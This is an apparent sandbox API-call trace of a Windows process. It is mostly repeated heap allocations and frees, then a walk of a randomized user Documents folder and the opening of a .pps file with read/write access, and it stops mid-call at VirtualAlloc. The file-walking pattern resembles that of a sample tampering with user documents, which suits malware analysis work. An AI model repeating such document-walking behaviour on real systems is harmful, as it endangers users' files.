1 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.122] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.123] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.124] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\zaZpqRQJk0\\") returned="zaZpqRQJk0\\" [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3e20 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.124] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\") returned="Gydf_ honDHk\\" [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3e20 | out: hHeap=0x680000) returned 1 [0097.124] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03170 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.124] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.124] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03170 | out: hHeap=0x680000) returned 1 [0097.124] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.124] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.125] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.125] PathFindFileNameW (pszPath="") returned="" [0097.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.125] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\zaZpqRQJk0\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x332e4960, ftCreationTime.dwHighDateTime=0x1d5bf09, ftLastAccessTime.dwLowDateTime=0x90bc71f0, ftLastAccessTime.dwHighDateTime=0x1d5c257, ftLastWriteTime.dwLowDateTime=0x90bc71f0, ftLastWriteTime.dwHighDateTime=0x1d5c257, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0097.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.125] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x332e4960, ftCreationTime.dwHighDateTime=0x1d5bf09, ftLastAccessTime.dwLowDateTime=0x90bc71f0, ftLastAccessTime.dwHighDateTime=0x1d5c257, ftLastWriteTime.dwLowDateTime=0x90bc71f0, ftLastWriteTime.dwHighDateTime=0x1d5c257, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.125] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290c3960, ftCreationTime.dwHighDateTime=0x1d5bc20, ftLastAccessTime.dwLowDateTime=0x789d8b50, ftLastAccessTime.dwHighDateTime=0x1d5bf4f, ftLastWriteTime.dwLowDateTime=0x789d8b50, ftLastWriteTime.dwHighDateTime=0x1d5bf4f, nFileSizeHigh=0x0, nFileSizeLow=0x18f19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CzHlo-7HJSHrYESuwSG.pps", cAlternateFileName="CZHLO-~1.PPS")) returned 1 [0097.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.125] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd6) returned 0x766b58 [0097.125] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.125] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\zaZpqRQJk0\\CzHlo-7HJSHrYESuwSG.pps") returned=".pps" [0097.125] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\zaZpqRQJk0\\CzHlo-7HJSHrYESuwSG.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\zazpqrqjk0\\czhlo-7hjshryesuwsg.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.125] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=102169) returned 1 [0097.126] VirtualAlloc 